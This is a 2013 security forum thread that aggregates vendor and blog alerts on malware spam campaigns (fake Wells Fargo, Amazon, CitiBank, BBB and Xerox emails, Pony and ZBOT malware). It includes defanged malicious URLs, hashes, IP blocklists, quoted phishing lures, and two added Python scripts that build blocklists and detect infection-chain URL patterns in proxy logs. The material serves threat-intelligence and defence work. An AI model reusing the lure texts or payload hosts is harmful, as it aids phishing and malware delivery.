IMPORTANT - WellsFargo
Typical e-mail details:
Please check attached documents.
Michael_Kane
Wells Fargo Advisors
817-563-5247 office
817-368-5170 cell [removed]
ATTENTION: THIS E-MAIL MAY BE AN ADVERTISEMENT OR SOLICITATION FOR PRODUCTS AND SERVICES.
To unsubscribe from marketing e-mails from:
· An individual Wells Fargo Advisors financial advisor: Reply to one of his/her e-mails and type “Unsubscribe” in the subject line.
· Wells Fargo and its affiliates: Unsubscribe at wellsfargoadvisors.com/unsubscribe.
Neither of these actions will affect delivery of important service messages regarding your accounts that we may need to send you or preferences you may have previously set for other e-mail services.
For additional information regarding our electronic communication policies, visit wellsfargoadvisors.com/disclosures/email-disclosure.html .
Investments in securities and insurance products are:
NOT FDIC-INSURED/NO BANK-GUARANTEES/MAY LOSE VALUE
Wells Fargo Advisors, LLC is a nonbank affiliate of Wells Fargo & Company, Member FINRA/SIPC. 1 North Jefferson, St. Louis, MO 63103
Malicious URLs
megmcenery .com/ponyb/gate.php
mceneryfinancial .com/ponyb/gate.php
margueritemcenery .com/ponyb/gate.php
hraforbiz. com/ponyb/gate.php
ftp(DOT)impactdata .com/da4.exe
errezeta .biz/ToSN79T.exe
ftp(DOT)myfxpips .com/PMLyQRMt.exe
207.204.5.170 /PXVYGJx.exe
Malicious File Name and MD5:
WellsFargo.<random>.zip (05c33cfcf22c5736C4a162f6d7c2eeac)
Important WellsFargo Docs.exe (47e739106c24fbf52ed3b8fd01dc3668)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/c2d7ca54263a0eb6d977f5ac9ab77207/tumblr_inline_mo6s1hL1ca1qz4rgp.png
- http://blog.dynamoo.com/2013/06/wells-fargo-spam-important-wellsfargo.html
10 June 2013 - "This fake Wells Fargo spam run comes with one of two malicious attachments:
Date: Mon, 10 Jun 2013 13:00:13 -0500 [14:00:13 EDT]
From: Anthony_Starr @wellsfargo .com
Subject: IMPORTANT - WellsFargo
Please check attached documents.
Anthony_Starr
Wells Fargo Advisors
817-563-9816 office
817-368-5471 cell Anthony_Starr @ wellsfargo .com
ATTENTION: THIS E-MAIL MAY BE AN ADVERTISEMENT OR SOLICITATION FOR PRODUCTS AND SERVICES.
To unsubscribe from marketing e-mails from:
· An individual Wells Fargo Advisors financial advisor: Reply to one of his/her
e-mails and type “Unsubscribe” in the subject line.
· Wells Fargo and its affiliates: Unsubscribe at
www .wellsfargoadvisors .com/unsubscribe. Neither of these actions will affect delivery of
important service messages regarding your accounts that we may need to send you or
preferences you may have previously set for other e-mail services.
For additional information regarding our electronic communication policies, visit
http :// wellsfargoadvisors .com/disclosures/email-disclosure.html .
Investments in securities and insurance products are:
NOT FDIC-INSURED/NO BANK-GUARANTEES/MAY LOSE VALUE
Wells Fargo Advisors, LLC is a nonbank affiliate of Wells Fargo & Company, Member
FINRA/SIPC. 1 North Jefferson, St. Louis, MO 63103 ...
There is a ZIP file attached to the email message, and the spammers have attempted to name the attachment after the recipient.. but because the spam has multiple recipients it may end up with a random name. Inside the ZIP file is an EXE file, and there appear to be -two- variants.
One is called Important WellsFargo Doc.exe and it has a pretty shocking VirusTotal detection rate of 0/47* (yup.. none at all). The Comodo CAMAS report** gives the following checksums..
Name Value
Size 94720
MD5 70e604777a66980bcc751dcb00eafee5
SHA1 52ef61b6296f21a3e14ae35320654ffe3f4e769d
SHA256 f669768216872c626abc46e4dd2e0b1d783ba5927166282922c16d6db3b8adae
..it identifies that this version of the malware attempts to download additional components from mceneryfinancial .com on 173.255.213.171 (specifically it is a pony downloader querying /ponyb/gate.php)... ThreatTrack has a more detailed report*** which also identifies callbacks to www.errezeta .biz and ftp.myfxpips .com. ThreatExpert has a slightly different report (1) and further identifies megmcenery .com, taxfreeincomenow .com, taxfreeincomenow .info and 207.204.5.170 (Linode, US). The second version has a similarly named file called Important WellsFargo Docs.exe (plural) with a higher VirusTotal detection rate of 11/46 (2). Comodo CAMAS reports(3) the following file characteristics..
Name Value
Size 114176
MD5 47e739106c24fbf52ed3b8fd01dc3668
SHA1 b85b4295d23c912f9446a81fd605576803a29e53
SHA256 2d0d16d29ceca912d529533aa850f1e1539f4b509ea7cb89b8839f672afb418b
..in this case the pony download contacts hraforbiz .com (also on 173.255.213.171). Other analyses are pending. Several of these malware domains are hosted on 173.255.213.171 (Linode, US) and we can assume that this server is compromised along with all the domains on it. 62.149.131.162 (Aruba, Italy) also seems to be compromised(4). 173.254.68.134 (5) (Unified Layer, US) and 207.204.5.170 (6) (Register .com, US) appear to be compromised in some way too. Of note is the fact that almost all of these domains appear to be legitimate but have been -hacked- in some way, I would expect them to be cleaned up at some point in the future. Putting all these IPs and domains together gives a recommended blocklist:
173.254.68.134
173.255.213.171
207.204.5.170
62.149.131.162 ..."
(More listed at the dynamoo URL above.)
* https://www.virustotal.com/en/file/f669768216872c626abc46e4dd2e0b1d783ba5927166282922c16d6db3b8adae/analysis/1370888138/
File name: Important WellsFargo Doc.exe
Detection ratio: 0/47
Analysis date: 2013-06-10
** http://camas.comodo.com/cgi-bin/submit?file=f669768216872c626abc46e4dd2e0b1d783ba5927166282922c16d6db3b8adae
*** http://www.dynamoo.com/files/analysis_31139_70e604777a66980bcc751dcb00eafee5.pdf
1) http://www.threatexpert.com/report.aspx?md5=70e604777a66980bcc751dcb00eafee5
2) https://www.virustotal.com/en/file/2d0d16d29ceca912d529533aa850f1e1539f4b509ea7cb89b8839f672afb418b/analysis/1370888252/
File name: Important WellsFargo Docs.exe
Detection ratio: 11/46
Analysis date: 2013-06-10
3) http://camas.comodo.com/cgi-bin/submit?file=f669768216872c626abc46e4dd2e0b1d783ba5927166282922c16d6db3b8adae
4) https://www.virustotal.com/en/ip-address/62.149.131.162/information/
5) https://www.virustotal.com/en/ip-address/173.254.68.134/information/
6) https://www.virustotal.com/en/ip-address/207.204.5.170/information/
___
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
E-mail Messages with Malicious Attachments - 2013 Jun 10
Fake Deposit Transfer Confirmation Notification E-mail Messages - 2013 Jun 10
Fake Documents Attachment Email Messages - 2013 Jun 10
Malicious Attachment Email Messages - 2013 Jun 10
Fake Bill Payment Notification Email Messages - 2013 Jun 10
Fake Legal Assistance Inquiry E-mail Messages - 2013 Jun 10
Fake Products Advertisement E-mail Messages - 2013 Jun 10
Fake FedEx Shipment Notification E-mail Messages - 2013 Jun 10
Fake Xerox Scan Attachment Email Messages - 2013 Jun 10
Fake Gift Voucher Redemption Email Messages - 2013 Jun 10
Fake Deposit Statement Notification E-mail Messages - 2013 Jun 10
(More detail and links at the cisco URL above.)
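The posts in this thread quote their indicators defanged in several styles ("storeyourbox .net", "hxxp ://", "ftp(DOT)", "[donotclick]", "190.147.81.28 /yqRSQ.exe") and mixed with hosting commentary ("46.18.160.86 - Saudi Electronic ..."). The following is an added example, not code from this thread or from the dynamoo, ThreatTrack or Webroot posts it quotes: it undoes those defanging styles, separates hosts from commentary, picks up MD5/SHA hashes, and emits a sorted blocklist of the kind the Wells Fargo and PAYVE posts above end with. SAMPLE_INDICATORS is a constructed excerpt of indicator lines in the posts' own notation; how each defanging style is reversed is my assumption about that notation.

```python
"""Turn the defanged indicators quoted in this thread into a blocklist (added example)."""
import ipaddress
import re
from dataclasses import dataclass, field
from typing import Optional, Set

# Order matters: strip scheme/bracket styles first, then close the "name .tld" gaps.
DEFANG_RULES = [
    (re.compile(r"\[donotclick\]", re.I), ""),
    (re.compile(r"hxxps?\s*://", re.I), ""),   # hxxp ://lukafalls .com
    (re.compile(r"https?\s*://", re.I), ""),   # http :// host (some posts quote it this way)
    (re.compile(r"\(DOT\)", re.I), "."),       # ftp(DOT)impactdata .com
    (re.compile(r"\[\.\]"), "."),              # freebeacon[.]com
    (re.compile(r"\s*\.\s*"), "."),            # storeyourbox .net, videotre .tv .it
]
HASH_RE = re.compile(r"\b[0-9a-f]{64}\b|\b[0-9a-f]{40}\b|\b[0-9a-f]{32}\b", re.I)
DOMAIN_RE = re.compile(r"^(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z]{2,}$")

# Constructed excerpt: indicator lines as they appear in the posts above.
SAMPLE_INDICATORS = """\
storeyourbox .net/ponyb/gate.php
drjoycethomasderm .com/ponyb/gate.php
errezeta .biz/ToSN79T.exe
190.147.81.28 /yqRSQ.exe
ftp(DOT)impactdata .com/da4.exe
[donotclick]pnpnews .net/news/readers-sections.php
hxxp ://lukafalls .com/banners/index.php – 95.154.254.17
forum.xcpus .com:8080/webstats/counter.php
46.18.160.86 - Saudi Electronic Info Exchange Company (Tabadul) JSC
190.93.23.10 (Greendot, Trinidad and Tobago)
190.93.23.10 ..."
freebeacon[.]com/nsa-leaker-surfaces-in-hong-kong/
MD5 fd18576bd4cf1baa8178ff4a2bef0849
Secure.<random>.zip (05c33cfcf22c5736C4a162f6d7c2eeac)
Blocklist:
"""


@dataclass
class Blocklist:
    ips: Set[str] = field(default_factory=set)
    domains: Set[str] = field(default_factory=set)
    hashes: Set[str] = field(default_factory=set)


def refang(token: str) -> str:
    """Undo the defanging styles listed in DEFANG_RULES and drop trailing quote/ellipsis debris."""
    s = token
    for pattern, repl in DEFANG_RULES:
        s = pattern.sub(repl, s)
    s = re.sub(r"\s+/", "/", s)            # "190.147.81.28 /yqRSQ.exe" -> "190.147.81.28/yqRSQ.exe"
    return s.rstrip(' ."\'')               # '190.93.23.10 ..."' -> "190.93.23.10"


def host_of(indicator: str) -> Optional[str]:
    """Lower-cased host of one refanged indicator, without scheme, port, path or trailing commentary."""
    s = refang(indicator)
    if not s:
        return None
    first = s.split()[0]                   # drops "(Greendot, Trinidad and Tobago)" style notes
    host = first.split("/", 1)[0]
    if re.search(r":\d+$", host):          # forum.xcpus.com:8080
        host = host.rsplit(":", 1)[0]
    return host.lower()


def classify(line: str, bl: Blocklist) -> None:
    """Route one line into hashes, IPs or domains; anything that is neither is ignored."""
    hashes = HASH_RE.findall(line)
    if hashes:
        bl.hashes.update(h.lower() for h in hashes)
        return                             # hash lines carry no network indicator
    for part in re.split(r"\s[–-]\s", line):   # "host – ip" and "ip - hoster" separators
        host = host_of(part)
        if not host:
            continue
        try:
            bl.ips.add(str(ipaddress.ip_address(host)))
            continue
        except ValueError:
            pass
        if DOMAIN_RE.match(host):
            bl.domains.add(host)


def build_blocklist(text: str) -> Blocklist:
    bl = Blocklist()
    for line in text.splitlines():
        if line.strip():
            classify(line.strip(), bl)
    return bl


def render(bl: Blocklist) -> str:
    """One indicator per line, grouped and sorted, for pasting into a proxy or DNS sinkhole list."""
    lines = ["# IPs"] + sorted(bl.ips, key=ipaddress.ip_address)
    lines += ["# domains"] + sorted(bl.domains)
    lines += ["# hashes"] + sorted(bl.hashes)
    return "\n".join(lines)


if __name__ == "__main__":
    print(render(build_blocklist(SAMPLE_INDICATORS)))
```

The hoster names, VirusTotal footnote URLs and plain prose are rejected because they never refang into a syntactically valid host, which is the only reason a line such as "46.18.160.86 - Saudi Electronic ..." contributes the IP but not the company name. Keep in mind the caveat the dynamoo posts themselves make: most of these domains are legitimate sites that were hijacked, so a list like this needs an expiry and a re-check rather than a permanent entry.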
AplusWebMaster
2013-06-11, 16:59
FYI...
Fake Fax Transmission emails lead to malware
- http://blog.webroot.com/2013/06/11/fake-unsuccessful-fax-transmission-themed-emails-lead-to-malware/
June 11, 2013 - "Have you sent an eFax recently? Watch out for an ongoing malicious spam campaign that tries to convince you that there’s been an unsuccessful fax transmission. Once socially engineered users execute the malicious attachment found in the fake emails, their PCs automatically join the botnet of the cybercriminals behind the campaign...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/06/fake_bogus_email_spam_efax_unsuccessful_fax_transmission_malware_malicious_software_social_engineering.png
Detection rate for the malicious attachment: MD5: 66140a32d7d8047ea93de0a4a419880b * ... UDS:DangerousObject.Multi.Generic... phones back to the following C&C server hxxp ://lukafalls .com/banners/index.php – 95.154.254.17, as well as to the following C&C IPs:
95.154.254.17, 190.179.212.30, 65.92.129.196, 125.25.82.22, 69.235.15.127, 108.215.44.142, 188.153.47.135, 76.226.112.216, 78.100.36.98, 190.162.42.76, 78.99.110.225, 118.101.184.54, 90.156.118.144, 212.182.121.226, 99.97.73.189, 181.67.50.91, 2.87.2.21, 108.215.99.94, 84.59.222.81, 142.136.161.103, 178.203.226.84, 95.234.169.221, 217.41.0.85, 71.143.224.43, 74.139.10.100, 78.38.40.207, 213.215.153.212 ..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/676fd873be5b1fbe322947b350635067adc5fe9b35a4a674341e517e79222f68/analysis/
File name: Fax details and transmission_report.doc.exe
Detection ratio: 31/47
Analysis date: 2013-06-10
___
Self-propagating ZBOT malware ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/going-solo-self-propagating-zbot-malware-spotted/
June 10, 2013 - "... we have spotted a new ZBOT variant that can spread on its own. This particular ZBOT variant arrives through a malicious PDF file disguised as a sales invoice document. If the user opens this file using Adobe Reader, it triggers an exploit which causes the following pop-up window to appear:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/06/zbot1.jpg
... error message upon execution of the malicious PDF file
While this is going on, the malicious ZBOT variant – WORM_ZBOT.GJ – is dropped onto the system and run. It is here that several differences start to appear. First of all, WORM_ZBOT.GJ has an autoupdate routine: it can download and run an updated copy of itself. Secondly, however, it can spread onto other systems via removable drives, like USB thumb drives. It does this by searching for removable drives and then creating a hidden folder with a copy of itself inside this folder, and a shortcut pointing to the hidden ZBOT copy.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/06/worm-zbot-BD-JPEG.jpg
... Portion of WORM_ZBOT.GJ code creating copy of itself
This kind of propagation by ZBOT is unusual... ZBOT malware is usually distributed by exploit kits and/or malicious attachments..."
- https://net-security.org/malware_news.php?id=2515
June 11, 2013 - "The Zeus / Zbot Trojan has been around since 2007, and it and its variants continued to perform MitM attacks, log keystrokes and grab information entered in online forms. It is usually spread via exploit kits (drive-by-downloads), phishing schemes, and social media..."
___
Washington Free Beacon compromised to serve up Malware
- http://www.invincea.com/2013/06/kia-the-washington-free-beacon-compromised-to-serve-up-malware/
UPDATE 10:02 a.m. 6/11 – "Repeated attempts to reach the Beacon have been unsuccessful. We have not seen reinfection in subsequent visits but it is hard to know without navigating every page...
WARNING: Do NOT browse to freebeacon[.]com until further notice, as the site is still actively redirecting user traffic to malware. The Washington Free Beacon has been notified but has not confirmed or responded... an article from The Washington Free Beacon on the breaking NSA Leaks story (freebeacon[.]com/nsa-leaker-surfaces-in-hong-kong/) linked to by the Drudge report has been compromising readers with a Java-based exploit kit* ... patching Java to the latest version (if you can) may be your only (temporary) protection..."
- http://www.invincea.com/wp-content/uploads/27.png
(More detail at the invincea URL above.)
* https://www.virustotal.com/en/file/bb5a8c01ff502c8ad8942f16c487f02ddae69df686e78974d99921e03de82252/analysis/1370873028/
File name: 1.jar
Detection ratio: 3/47
Analysis date: 2013-06-10
___
Something evil on 173.255.213.171
- http://blog.dynamoo.com/2013/06/something-evil-on-173255213171.html
11 June 2013 - "As a follow-up to this post*, the exploit server on 173.255.213.171 (Linode, US) is hosting a number of -hijacked- GoDaddy-registered domains that are serving an exploit kit [1] [2]... block 173.255.213.171 ..."
* http://blog.dynamoo.com/2013/06/wells-fargo-spam-important-wellsfargo.html
1) https://www.virustotal.com/en/ip-address/173.255.213.171/information/
2) http://urlquery.net/search.php?q=173.255.213.171&type=string&start=2013-05-27&end=2013-06-11&max=50
___
CitiBank Secure Message Spam
- http://threattrack.tumblr.com/post/52714672175/citibank-secure-message-spam
June 11, 2013 - "Subjects Seen:
(SECURE)Electronic Account Statement [removed]
Typical e-mail details:
You have received a Secure PDF message from the CitiSecure Messaging Server.
Open the PDF file attached to this notification. When prompted, enter your Secure PDF password to view the message contents.
To reply to this message in a secure manner, it is important that you use the Reply link inside the Secure PDF file. This will ensure that any confidential information is sent back securely to the sender.
Help is available 24 hours a day by calling 1-866-535-2504 or 1-904-954-6181 or by email at secure.emailhelp @citi .com
Please note: Adobe Reader version 7 or above is required to view all SecurePDF messages.
Malicious URLs
chriscarlson .com/ponyb/gate.php
chrisandannwedding .com/ponyb/gate.php
ccrtl .com/ponyb/gate.php
chrisandannwedding .com/ponyb/gate.php
hoteloperaroma .it/Sb9A7JV1.exe
stitaly .net/E2KYVJD.exe
newmountolivet .org/iUHgGvn.exe
mozzarellabroker .com/pZYTn.exe
Malicious File Name and MD5:
Secure.<random>.zip (05c33cfcf22c5736C4a162f6d7c2eeac)
secure.pdf.exe (4209430a3393287d5e28def88e43b93b)
ThreatAnalyzer Report: http://db.tt/RtlUb5Vs [PDF]
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/c2580fcc770c2b3ec8b2b809b4e19620/tumblr_inline_mo8kobS8e01qz4rgp.png
___
Amazon Order Notification Spam
- http://threattrack.tumblr.com/post/52735974435/amazon-order-notification-spam
June 11, 2013 - "Subjects Seen:
Payment for Your Amazon Order # [removed]
Typical e-mail details:
We’re writing to let you know that we are having difficulty processing your payment for the above transaction. To protect your security and privacy, your issuing bank cannot provide us with
information regarding why your credit card was declined.
However, we suggest that you double-check the billing address, expiration date and cardholder name
that you entered; if entered incorrectly these will sometimes cause a card to decline. There is no
need to place a new order as we will automatically try your credit card again.
There are a few steps you can take to make the process faster:
1. Verify the payment information for this order is correct (expiration date, billing address, etc).
You can update your account and billing information at :
amazon .com/gp/css/summary/edit.html?ie=UTF8&orderID=[removed]
2. Contact your issuing bank using the number on the back of your card to learn more about their
policies. Some issuers put restrictions on using credit cards for electronic or internet
purchases. Please have the exact dollar amount and details of this purchase when you call the
bank. If paying by credit card is not an option, buy Amazon.com Gift Card claim codes with cash
from authorized resellers at a store near you. Visit amazon.com/cashgcresellers to learn
more.
Thank you for shopping at Amazon.com. Sincerely, Amazon.com Customer Service
Malicious URLs
gnqlawyers .com/proteans/index.html
eucert .com/herein/index.html
gauravvashisht .com/desisted/index.html
goldcoinvault .com/news/pictures_hints_causes.php
sweethomesorrento .it/t0q.exe
server1.extra-web .cz/fdCtJM.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/4e9fe3a8ecdad467f2a458919e0e8d24/tumblr_inline_mo8z4f3ZjB1qz4rgp.png
- http://blog.dynamoo.com/2013/06/amazoncom-spam-goldcoinvaultcom.html
June 11, 2013 - "This fake Amazon.com spam leads to malware on goldcoinvault .com:
Date: Tue, 11 Jun 2013 14:25:21 -0600 [16:25:21 EDT]
From: "Amazon.com Customer Care Service" [payments-update @amazon .com]
Subject: Payment for Your Amazon Order # 104-884-8180383
Regarding Your Amazon.com Order
Order Placed: June 11, 2013
Amazon.com order number: 104-884-8180383
Order Total: $2761.86 ...
The link in the email goes through a legitimate hacked site to an intermediate page with the following redirectors:
[donotclick]ftp.blacktiedjent .com/mechanic/vaccinated.js
[donotclick]piratescoveoysterbar .com/piggybacks/rejoiced.js
[donotclick]nteshop .es/tsingtao/flanneling.js
..from there it hits the main malware payload site at [donotclick]goldcoinvault .com/news/pictures_hints_causes.php (report here*) hosted on goldcoinvault .com which is a hacked GoDaddy domain -hijacked- to point at 173.255.213.171 (Linode, US). This same server is very active and has been spotted here** and here***, also using hacked GoDaddy domains, but right at the moment the malware page appears to be 403ing which is good..."
* http://urlquery.net/report.php?id=3054553
** http://blog.dynamoo.com/2013/06/something-evil-on-173255213171.html
*** http://blog.dynamoo.com/2013/06/wells-fargo-spam-important-wellsfargo.html
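The posts above describe the same chain repeatedly: a hacked site or .js redirector, a BlackHole landing page under /news/<word>_<word>.php (the pattern urlquery labels "BlackHole v2.0 exploit kit URL pattern"), a short random-named .exe fetched from the root of another hacked site, and then the Pony downloader beaconing to /ponyb/gate.php. The following is an added example, not code from this thread or from the blogs it quotes: it runs those three URL patterns over proxy log lines and reports which internal hosts show the whole landing -> payload -> gate sequence rather than a single hit. The three regexes are my generalisation of the URLs quoted in the posts, and the log format and SAMPLE_LOG lines are constructed for the example.

```python
"""Flag BlackHole landing, random-EXE payload and Pony gate URLs in proxy logs (added example)."""
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple
from urllib.parse import urlsplit


class Hit(NamedTuple):
    ts: str
    src: str
    method: str
    rule: str
    url: str


# Generalised from the URLs quoted in the posts above; the EXE rule is a heuristic
# (a legitimate /update.exe at a site root would match too), so treat it as a
# correlation signal rather than a block on its own.
RULES = [
    ("pony-gate", re.compile(r"^/ponyb/gate\.php$")),
    ("blackhole-landing", re.compile(r"^/news/[a-z]+(?:[_-][a-z]+)+\.php(?:\?.*)?$")),
    ("bare-exe-download", re.compile(r"^/[A-Za-z0-9]{3,12}\.exe$")),
]

# Stage order of the infection chain described in the posts.
CHAIN = ("blackhole-landing", "bare-exe-download", "pony-gate")

# Constructed log lines: "<timestamp> <client> <method> <url> <status>".
# Hosts are the ones quoted in the Amazon, Wells Fargo and eFax posts; 10.1.4.52 is a clean control.
SAMPLE_LOG = """\
2013-06-11T18:02:11Z 10.1.4.37 GET http://piratescoveoysterbar.com/piggybacks/rejoiced.js 200
2013-06-11T18:02:12Z 10.1.4.37 GET http://goldcoinvault.com/news/pictures_hints_causes.php 200
2013-06-11T18:02:15Z 10.1.4.37 GET http://goldcoinvault.com/news/pictures_hints_causes.php?jnlp=bd187af1d0 200
2013-06-11T18:02:40Z 10.1.4.37 GET http://sweethomesorrento.it/t0q.exe 200
2013-06-11T18:03:02Z 10.1.4.37 POST http://hraforbiz.com/ponyb/gate.php 200
2013-06-11T18:03:05Z 10.1.4.52 GET http://www.example.com/news/index.php 200
2013-06-11T18:03:09Z 10.1.4.52 GET http://download.example.com/downloads/setup.exe 200
"""


def match_url(url: str) -> List[str]:
    """Names of every rule whose pattern matches the path (and query) of url."""
    parts = urlsplit(url)
    target = parts.path + ("?" + parts.query if parts.query else "")
    return [name for name, rx in RULES if rx.match(target)]


def scan_log(text: str) -> List[Hit]:
    hits: List[Hit] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, method, url, _status = line.split()[:5]
        for rule in match_url(url):
            hits.append(Hit(ts, src, method, rule, url))
    return hits


def by_source(hits: List[Hit]) -> Dict[str, List[Hit]]:
    groups: Dict[str, List[Hit]] = defaultdict(list)
    for h in hits:
        groups[h.src].append(h)
    return dict(groups)


def full_chain(hits_for_one_host: List[Hit]) -> bool:
    """True when landing, payload and gate hits occur in that order for one client."""
    stage = 0
    for h in sorted(hits_for_one_host, key=lambda h: h.ts):
        if h.rule == CHAIN[stage]:
            stage += 1
            if stage == len(CHAIN):
                return True
    return False


def triage(text: str) -> Dict[str, str]:
    """Per client: 'full chain' when every stage was seen in order, otherwise 'partial'."""
    return {src: ("full chain" if full_chain(hs) else "partial")
            for src, hs in by_source(scan_log(text)).items()}


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(h.src, h.rule, h.url)
    print(triage(SAMPLE_LOG))
```

The ordering check is what turns three noisy patterns into something worth paging on: a lone /something.exe download is common, but a client that fetched a /news/<word>_<word>.php page, then a root-level .exe, then posted to /ponyb/gate.php within a minute matches the infection chain the posts describe end to end. The URL strings in the gate and landing rules change per campaign, so the patterns need refreshing from current reports rather than being kept as-is.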
AplusWebMaster
2013-06-12, 15:56
FYI...
Casino PUA software SPAM ...
- http://blog.webroot.com/2013/06/12/tens-of-thousands-of-spamvertised-emails-lead-to-w32casonline/
June 12, 2013 - "Fraudsters are currently spamvertising tens of thousands of emails enticing users into installing rogue, potentially unwanted (PUAs) casino software. Most commonly known as W32/Casonline, this scam earns revenue through the rogue online gambling software’s affiliate network... (multiple screenshots at the URL above)... Spamvertised URLs:
hxxp ://luckynuggetcasino .com – 67.211.111.163
hxxp ://888casino .com – 213.52.252.59
hxxp ://spinpalace.com – 109.202.114.65
hxxp ://alljackpotscasino.com – 64.34.230.122
hxxp ://allslotscasino.com – 64.34.230.149
... (multiple) MD5s... have also phoned back to the same IP (213.52.252.59)... (Low detection rates per Virustotal - links at the webroot URL above)...
We advise users to avoid interacting with any kind of content distributed through spam messages, especially clicking on any of the links found in such emails...."
___
Fake BBB SPAM / trleaart .net
- http://blog.dynamoo.com/2013/06/bbb-spam-trleaartnet.html
12 June 2013 - "This fake BBB spam with a "PLAINT REPORT" (sic) leads to malware on trleaart .net:
From: Better Business Bureau [mailto:rivuletsjb72 @bbbemail .org]
Sent: 11 June 2013 18:04
Subject: Better Business Beareau Complaint ¹ S3452568
Importance: High
Sorry, your e-mail does not support HTML format. Your messages can be viewed in your browser
Better Business Bureau ©
Start With Trust
Tue , 11 Jun 2013
Issue N. S3452568
The Better Business Bureau has been booked the above said claim letter from one of your customers in respect of their dealings with you. The detailed description of the consumer's trouble are available visiting a link below. Please pay attention to this matter and inform us about your mind as soon as possible.
We amiably ask you to open the PLAINT REPORT to answer on this claim.
We awaits to your prompt response.
Faithfully yours
Daniel Cox
Dispute Advisor...
Better Business Bureau...
Screenshot: https://lh3.ggpht.com/-ZaIrOeD1dnc/Ubg75F2bnoI/AAAAAAAABRQ/EM7rW99Jkac/s400/bbb2.png
The link goes through a legitimate -hacked- site and end up with a malware landing page on [donotclick]trleaart .net/news/members_guarantee.php (report here*) hosted on the following IPs:
160.75.169.49 (Istanbul Technical University, Turkey)
186.215.126.52 (Global Village Telecom, Brazil)
190.93.23.10 (Greendot, Trinidad and Tobago)
193.254.231.51 (Universitatea Transilvania Brasov, Romania)
This network of evil sites is rather large... in the meantime here is a partial blocklist:
160.75.169.49
186.215.126.52
190.93.23.10
193.254.231.51 ..."
* http://urlquery.net/report.php?id=3067317
___
Malware sites to block 12/6/13
- http://blog.dynamoo.com/2013/06/malware-sites-to-block-12613.html
12 June 2013 - "This is a refresh of this list of domains and IPs controlled by what I call the "Amerika" gang, and it follows on from this BBB spam run earlier. Note that IPs included in this list show recent malicious activity, but it could be that they have now been fixed. I also noticed that a couple of the domains may have been sinkholed, but it will do you no harm to block them anyway..."
(LONG list at the dynamoo URL above - includes "Plain IPlist for copy-and-pasting".)
___
Fake "Activation Needed" emails...
- http://security.intuit.com/alert.php?a=82
6/11/13 - "People are receiving -fake- emails with the title "Important Activation Needed".
Below is a copy of part of the email people are receiving:
Screenshot: http://security.intuit.com/images/importact.jpg
... This is the end of the -fake- email.
Steps to Take Now
Do not open the attachment in the email...
Delete the email..."
___
GAMARUE malware uses Sourceforge to host files
- http://blog.trendmicro.com/trendlabs-security-intelligence/gamarue-uses-sourceforge-to-host-files/
June 11, 2013 - "In our monitoring of the GAMARUE malware family, we found a variant that used the online code repository SourceForge to host malicious files... SourceForge is a leading code repository for many open-source projects, which gives developers a free site that allows them to host and manage their projects online. It is currently home to more than 324,000 projects and serves more than 4 million downloads a day... GAMARUE malware poses a serious risk to users; attackers are able to gain complete control of a system and use it to launch attacks on other systems, as well as stealing information. Among the most common ways it reaches user systems are: infected removable drives, or the user has visited sites compromised with the Blackhole Exploit Kit. This attack is made up of four files. The first is a shortcut, which appears to be a shortcut to an external drive. (This is detected as LNK_GAMARUE.RMA.) Instead of a drive, however, it points to a .COM file (detected as TROJ_GAMARUE.LMG)...
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/06/gamaruediagram.png
GAMARUE Infection Chain
Once the executable file is decrypted, it downloads updates to itself, as well as malicious files from a SourceForge project. In effect, it uses SourceForge to unwittingly host malicious files... The malicious files in the above example were hosted under the tradingfiles project. The same user created two more projects that were also used to host malicious GAMARUE files: ldjfdkladf and stanteam. New files were uploaded in these projects from June 1 onwards..."
- https://net-security.org/malware_news.php?id=2517
June 12, 2013 - "... the infection with a variant of the information-stealing Gamarue starts with a shortcut file to an external file, and ends with malicious files being downloaded from one of three (obviously bogus) Sourceforge projects: "tradingfiles," "stanteam," and "ldjfdkladf". The first two have already been deleted, and the third one emptied of all files. The account of the user who created them has been deleted (whether or not by Sourceforge or the user it's impossible to tell), but according to the researchers new files were uploaded into these projects from June 1 onwards..."
___
Fake Xerox WorkCentre Spam
- http://threattrack.tumblr.com/post/52796249184/xerox-workcentre-spam
June 12, 2013 - "Subjects Seen:
Scan from a Xerox WorkCentre
Typical e-mail details:
Please download the document. It was scanned and sent to you using a Xerox multifunction device.
File Type: pdf
Download: Scanned from a Xerox multi~3.pdf
multifunction device Location: machine location not set
Device Name: Xerox6592
For more information on Xerox products and solutions, please visit xerox .com
Malicious URLs
forum.xcpus .com:8080/webstats/counter.php
buildmybarwebsite .com/webstats/counter.php
continentalfuel .com/webstats/counter.php
apparellogisticsgroup .net/Aq70QrZ.exe
ftp(DOT)celebritynetworks .com/dNYC.exe
portal.wroctv .com/inZGwEH.exe
videotre .tv .it/UmQ.exe
Malicious File Name and MD5:
Scan_<random>.zip (0375c95289fc0e2dd94b63c105c24373)
Scan_<random> (8fcba93b00dba3d182b1228b529d3c9e)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/37b720f293e37a73fd8edc4be4883843/tumblr_inline_moag33uzKT1qz4rgp.png
- http://blog.dynamoo.com/2013/06/scan-from-xerox-workcentre-spam.html
12 June 2013 - "This fake Xerox WorkCentre spam comes with a malicious attachment and appears to come from the victim's own domain:
Date: Wed, 12 Jun 2013 10:36:16 -0500 [11:36:16 EDT]
From: Xerox WorkCentre [Xerox.Device9@victimdomain.com]
Subject: Scan from a Xerox WorkCentre
Please download the document. It was scanned and sent to you using a Xerox multifunction device.
File Type: pdf
Download: Scanned from a Xerox multi~3.pdf
multifunction device Location: machine location not set
Device Name: Xerox2023
For more information on Xerox products and solutions, please visit http ://www.xerox .com
